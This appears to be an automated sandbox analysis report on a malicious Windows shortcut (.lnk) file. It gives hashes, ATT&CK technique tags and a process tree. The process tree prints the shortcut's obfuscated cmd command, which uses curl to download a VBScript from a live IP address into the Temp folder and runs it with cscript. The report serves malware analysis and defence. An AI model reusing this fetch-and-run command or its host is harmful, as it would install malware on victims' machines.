97a76d5b72a6cb285f4312277e08655f4e9c5315e56485175c5dc100667c5c65

Analysis

max time kernel
143s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
22/09/2023, 01:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

66e3be9ed2f0e4b2e04753fe1b0a0c6090e984fb0a5128804fa369ed2a4a03b8.lnk
Size

2KB
MD5

3b9e3ec73aa1ebd4133a1bbc6a26e023
SHA1

d3ca550c756f999abbdb149679bdf13bca2bd242
SHA256

66e3be9ed2f0e4b2e04753fe1b0a0c6090e984fb0a5128804fa369ed2a4a03b8
SHA512

d3b24eff74ba6ce1cedb0f6846f08de4eb815bafa796cf284f9f5c1511c2107e57751beab178fd2cca6e7143b466406fa368acd324ea42f64b9a3694aadabda0

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
432	PING.EXE
1720	PING.EXE

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1888 wrote to memory of 3332	1888	cmd.exe	85
PID 1888 wrote to memory of 3332	1888	cmd.exe	85
PID 3332 wrote to memory of 432	3332	cmd.exe	86
PID 3332 wrote to memory of 432	3332	cmd.exe	86
PID 3332 wrote to memory of 4896	3332	cmd.exe	89
PID 3332 wrote to memory of 4896	3332	cmd.exe	89
PID 3332 wrote to memory of 1720	3332	cmd.exe	91
PID 3332 wrote to memory of 1720	3332	cmd.exe	91
PID 3332 wrote to memory of 4364	3332	cmd.exe	92
PID 3332 wrote to memory of 4364	3332	cmd.exe	92

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\66e3be9ed2f0e4b2e04753fe1b0a0c6090e984fb0a5128804fa369ed2a4a03b8.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1888
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c OJB || ECHo OJB & Pin"g" OJB || CurL http://89.208.106.218/XXR/Bbd -o C:\Users\Admin\AppData\Local\Temp\OJB.vbs & Pin"g" -n 3 OJB || csC"RIP"T C:\Users\Admin\AppData\Local\Temp\OJB.vbs & ExIT
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3332
- - C:\Windows\system32\PING.EXE
    Pin"g" OJB
    3⤵
    - Runs ping.exe
    PID:432
- - C:\Windows\system32\curl.exe
    CurL http://89.208.106.218/XXR/Bbd -o C:\Users\Admin\AppData\Local\Temp\OJB.vbs
    3⤵
    PID:4896
- - C:\Windows\system32\PING.EXE
    Pin"g" -n 3 OJB
    3⤵
    - Runs ping.exe
    PID:1720
- - C:\Windows\system32\cscript.exe
    csC"RIP"T C:\Users\Admin\AppData\Local\Temp\OJB.vbs
    3⤵
    PID:4364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads